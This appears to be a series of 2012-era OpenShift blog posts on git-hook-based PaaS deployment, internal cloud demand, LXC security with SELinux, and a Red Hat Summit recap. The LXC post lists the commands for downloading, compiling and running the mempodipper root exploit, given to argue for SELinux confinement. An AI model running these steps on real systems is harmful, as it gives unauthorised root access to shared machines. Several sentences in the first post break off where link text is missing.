Building an Open Source PaaS Deployment Model

To some, cloud is an excuse to introduce “black box” processes that lock users into their services.  But they can’t really come right out and say that.  Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand.  This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing.  In the past, we’ve seen it at the operating system level and the hypervisor level.  We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.

When we started designing and building OpenShift, we wanted to provide more than just a good experience to end users that, in turn, locked them in to our service.  One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels.  We did want the user experience to be magical but also completely accessible to those wanted to dig in.  To demonstrate this, let’s walk through the deployment process in OpenShift – arguably the most magical part of the entire offering…

As we were designing a PaaS service, focused on developers, our first goal was to make the deployment process as natural as possible for developers.  For most developers, their day to day process goes something like code, code, code, commit.  For those questioning this process already let me speak on behalf of the developer in question by saying

Tests?! Of course I’ve already written the tests!  They were in the third ‘code’!

Anyway, we wanted to plug into that process and to do that we chose git.  The reason for selecting git over more centralized source code management tools like subversion was that the distributed nature of git allowed the user to have full control over their data.  The user always had access to their entire historical repository and as developers, we thought that was a critical requirement.  Given that, we standardized on git as the main link between our users’ code and OpenShift.

Now let’s look at what that development process might look like in practice.  First, you start off with the code, code, commit part:

vi <file of your choice>
# make earth shattering changes
git commit -a -m "My earth shattering comment"

The next part of the process for those familiar with git is the publish process.  You run a ‘push’ command to move your code from your local repository to your distributed clones.  So when you run:

git push

Your code is transferred to OpenShift and automatically deployed to your environment.  Regardless of whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, a specific packaging spec needs to be built – it all happens on the server side with this one command.  To do this we utilize a git hook to kick off the deployment process.  Wait – I know what you are thinking…

What?!  Just a git hook?!  This is the cloud baby!  Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!

If you ask us, a git hook works just fine because it’s what you would probably do yourself.  We simply .  That script invokes a series of scripts (called hooks) representing various steps in the deployment process.  Some of the hooks are provided by the cartridge that your application is using and some of the scripts are provided by the application itself.  This approach let’s the cartridge provide base functionality that can be further customized by the application.

First let’s talk about the cartridge hooks.  Having cartridge specific hooks is important because each cartridge needs to do different things in their deployment process.  For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler.  The cool part is that each individual cartridge can override anything it needs to in the default process.

Let’s look at how the Ruby cartridge implements this.  We can look at the ruby-1.9 cartridge’s overridden .  When you use the Java cartridge, it leverages Maven in the build process .  You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else.  In isolation, each individual script is really quite simple.  In aggregate though, all those extensions can become extremely powerful and do much of the heavy lifting on behalf of the users.

But, what if you want to change the default behavior for a specific application?  No problem!  You have a collection of .  You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense.These are found in your application in ~/.openshift/action_hooks.  They are invoked just like the cartridge hooks as part of the deployment process.  For example, you can see how the .  What you choose to do with these hooks is your decision.  Put some code in them and they will get called at each step in the deployment process.  This let’s you not only leverage the power of a customized cartridge, but also let’s you tweak and tune so things are just right for your application.

At the end of the day, harnessing the power of the cloud doesn’t need to lock you into a vendor.  At OpenShift, we believe that transparency, standards and extensibility will make a process that lasts the test of time.  I hope this has provided some visibility to how the OpenShift deployment model works and also has given you some insight into navigating the codebase.  And if this has peaked your interested and you find yourself digging through more and more code, please reach out and get involved.

IT Cloud Myths around Dynamic Demand (or the lack thereof….)

Today I read a great article that compared the adoption of cloud in IT to the adoption of open source.  In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted.  Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field.  In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:

I don’t have dynamic demand – cloud won’t help me

That is a tricky defense tactic because many people in IT believe it to be true.  To dispel this myth, I find it best to break demand into external and internal demand.

It is fairly easy to tell whether your company has dynamic external demand.  That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event driven demand (e.g. Superbowl ad).  Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud but that is only half the story.

However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unknown dynamic demand internally: their own consumers and development teams.  But when first asked, they often believe this not to be the case.  The conversation usually goes this way:

Question: Are you giving your users all the resources they think they need?

Answer: No.  They always ask for more than they need and we don’t have the capacity.  The initial requests just aren’t reasonable.

Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?

Answer: We have to make the process tough.  If we gave users what they asked for, we’d go broke!

Question: Do your users ever give back unused resources or do they try and hold on to them forever?

Answer: That’s just it – they never give anything back!  They would keep it forever if we didn’t watch them like hawks and claw it all back…

At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:

Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?

Answer: (long pause) Yeah…. I guess we would.  (long pause) Haven’t thought about it that way before…

I’ve had this same conversation play out time and time again.  Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need.  They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider.  Under-served users will just go directly to the public cloud providers and work around IT entirely.  This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.

IT organizations that embrace these changes will more likely end up being a strategic partner with their users.  By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have.  Having worked in IT, I think this is underlying desire of many IT shops.  Unfortunately, the processes they have built for themselves are often working against that desire without them even knowing.  Those that will survive will need to change and change fast to maintain relevance.

Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc.  This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach.  LXC  aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no it’s not enough.  The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a ‘cluster’.  While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long ways out from being a realistic defense, especially on the production systems in deployment today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount knowledge and creativity, using an exploit for malicious purposes isn’t that challenging.  For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let’s look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don’t have to worry about this since I don’t let people run arbitrary code run on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.

Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?!  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of what user they happen to be.  SELinux provides a layer of protection against the root layer where most other security mechanisms fail.  When a user is running in a SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It’s easy for you to establish a confined environment that limits riskier operations like syscalls to setuid and restricts memory access which, in turn, would stop this exploit and others.  Most importantly, you can get consistent protection across any process, no matter what user they are running as.

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.

While it’s not a silver bullet, it’s an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are going to probably allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff :)

Interested in learning more?  The place I recommend to start is with the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don’t get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist.  In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache.  In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies.  Probably not your best use of time and would be a daunting first experience with SELinux to say the least.

My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend on putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

Red Hat Summit Recap – 2012

Last month we had our annual Red Hat Summit.  I always look forward to Summit as it gives me the ability to connect with users and customers at a frequency that I don’t get on a daily basis.  I try and spend as much time as I can with users and customers, both in understanding their current needs as well as deducing some trends for the upcoming year.  Here are my conclusions for the 2012 Summit:

1. IT shops are moving beyond basic virtualization (finally!)

Now, this is probably a bit skewed since I’m an OpenShift guy and tend to be asked a lot of PaaS / IaaS / Cloud questions, but there was something different this year.  The questions I was being asked had enough depth that it wasn’t just casual prodding of things to expect with ‘cloud’, but questions from customers that had been through designs and experimentation themselves.  This was an exciting change for me because it means that IT shops are becoming comfortable enough with the core capabilities like virtualization and provisioning to pursue more.  Private cloud and IaaS capabilities are maturing quite a bit and there was a lot of questions on usage and expectations on all fronts.  The big issue everyone was bumping up into with the public cloud was data locality and regulations.  I think that is going to be a challenge for years to come but luckily private cloud solutions are getting more robust which will let IT shops in that predicament still compete.  In fact, Red Hat announced our Enterprise PaaS offering which includes offerings installable in customer data centers.  I think being able to bridge the private and public cloud is going to be a key requirement for any vendor looking to compete in this space.

2. SELinux is getting more popular with cloud deployments

I’m not used to being asked SELinux questions at all really.  Heck, I’m usually the guy promoting it at conferences and educating people on it.  So by the 3rd or 4th time SELinux conversations were coming up, I had to wonder what was changing.  My conclusion is that with most things cloud, achieving maximum density and cost effectiveness is usually a primary goal.  However, in many cases, extreme density comes at the cost of security.  Given the amount of security exposures that made big headlines recently, it appears that a refocusing on the security side of solutions is occurring.  It also appears that people are starting to realize that SELinux provides a very elegant solution to help avoid having to make this compromise.  SELinux provides a layer of security at the kernel that allows you to securely segment filesystem and process interactions (among other things).  This allows you to run a variety of workloads on the same machines, using and overcommitting the underlying resources as necessary without giving up the ability to segment those applications.  Segmentation used to be something only attempted at a virtual machine or physical machine level.  That is no longer be the case.  On OpenShift we’ve been a fan of this approach for a long time and it’s worked extremely well.  Glad that others are looking at the same model.

3. Developer efficiency is becoming a focus of IT shops

Okay, this one is definitely biased since I’m a PaaS guy.  That said, before I was a PaaS guy, I was an IT guy.  I worked on both the development and the operational side of the house for several years.   One of things I learned with operations is that they traditionally care more about the running system than the development process.  The opposite was true for development – they often ignore the complexities of keeping their code running and focus on cutting new code.  However, as operations generally controls much of  the IT budget, it was always a struggle to actually get the development side of the house productive.  In 2009, the idea of a DevOps model was introduced which would bring both sides of IT closer together and harmony would ensue… Why then has it taken until 2012 for this to start to take hold?  I think that very strong catalyst was needed to force a change in the existing behavior.  And these days, there are quite a few catalysts that are forcing change in many companies: the public cloud, the economy and startup competition.  For the first time in a while, I was talking with customers that were legitimately trying to bring their development and operational processes together.  In some cases, it was an operational change driven by the transparency of public cloud pricing and realizing that if they couldn’t compete, developers could get services elsewhere.  In some cases it was the economic pressure pushing companies to do more with less.  And in other cases, it was the realization of what some very small companies have been able to achieve just using cloud-based services.  Whatever the motivation, companies are re-invigorated to compete and ready to change to make that happen.  I love seeing that and I think these companies will be the ones that push the boundaries of PaaS offerings and help that space to continue to evolve.